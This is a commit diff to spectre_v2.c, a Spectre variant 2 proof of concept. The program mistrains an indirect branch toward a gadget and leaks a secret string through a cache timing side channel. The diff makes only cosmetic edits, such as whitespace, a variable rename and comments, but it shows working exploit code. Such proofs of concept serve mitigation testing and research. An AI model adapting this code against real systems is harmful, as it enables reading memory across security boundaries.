Typos, change variable name for readability

spectre_v2.c

@@ -26,7 +26,7 @@ char* 		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism,
 uint64_t*	target; // pointer to indirect call target
 unsigned int 	cache_hit_threshold, array1_size = 16;
 uint8_t 	unused1[64], unused2[64], array2[256 * 512], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
-uint8_t 	temp = 0; /* Used so compiler won’t optimize out victim_function() */
+//uint8_t 	temp = 0; /* Used so compiler won’t optimize out victim_function() */
 uint8_t 	channel[256 * GAP]; // side channel to extract secret phrase
 
 // mistrained target of indirect call
@@ -44,15 +44,15 @@ safe_target(char* addr)
 }
 
 // function that makes indirect call
-// note that addr will be passed to gadget via %rdi
+// note that addr will be passed to gadget via %rdi 
 int 
-victim_function(char* addr, int	input)
+victim_function(char* addr, int input)
 {
 	#pragma GCC diagnostic ignored "-Wuninitialized"
 	unsigned int result, junk = junk;
 	// set up branch history buffer (bhb) by performing >29 taken branches
 	// see https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html
-	//   for details about how the branch prediction mechanism works
+	// for details about how the branch prediction mechanism works
 	// junk and input used to guarantee the loop is actually run
 	for (int i = 1; i <= 100; i++) {
 		input += i;
@@ -61,10 +61,10 @@ victim_function(char* addr, int	input)
 	// call *target
 	__asm volatile(
 		"mov %%rax, %2\n"
-        "callq *%1\n"
+        	"callq *%1\n"
 		"mov %0, %%eax\n"
 		: "=r" (result)
-		: "r" (*target), "r" (addr)
+		: "r" (*target), "rm" (addr)
 		: "rax", "rcx", "rdx", "rsi", "rdi", "r8", "r9", "r10", "r11");
 	return result & junk;
 }
@@ -87,6 +87,7 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
 		channel[i * GAP] = 1;
 	}
 	for (tries = 999; tries > 0; tries--) {
+		// Malicious target 
 		*target = (uint64_t)&gadget;
 		#ifndef NOMFENCE
 		_mm_mfence();
@@ -94,7 +95,6 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
 		for (j = 50; j > 0; j--) {
 			junk ^= victim_function(&dummy, 0);
 		}
-
 		#ifndef NOMFENCE
 			_mm_mfence();
 		#endif 
@@ -129,7 +129,9 @@ leak(char* target_addr, uint8_t value[2], int score[2], unsigned cache_hit_thres
 		#ifndef NOMFENCE
 			_mm_mfence();
 		#endif 
-		// call victim
+		// call victim 
+
+		//printf("victim with %p\n", target_addr);
 		junk ^= victim_function(target_addr, 0);
 		#ifndef NOMFENCE
 			_mm_mfence();
@@ -165,7 +167,7 @@ main(int argc, char** argv)
 {
 	int 		o, score[2], len = (int)strlen(secret), json = 0, successes = 0;
 	uint8_t 	value[2];
-	char*		addr = secret;
+	char*		secret_addr = secret;
 	
 	while ((o = getopt(argc, argv, "t:j")) != EOF) {
 		switch (o) {
@@ -197,7 +199,7 @@ main(int argc, char** argv)
 		}
 	#endif
 	while (--len >= 0) {
-		leak(addr++, value, score, cache_hit_threshold);
+		leak(secret_addr++, value, score, cache_hit_threshold);
 		if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
 			successes++;
 			fprintf(stderr, "\033[32m%c\033[0m", (value[0]));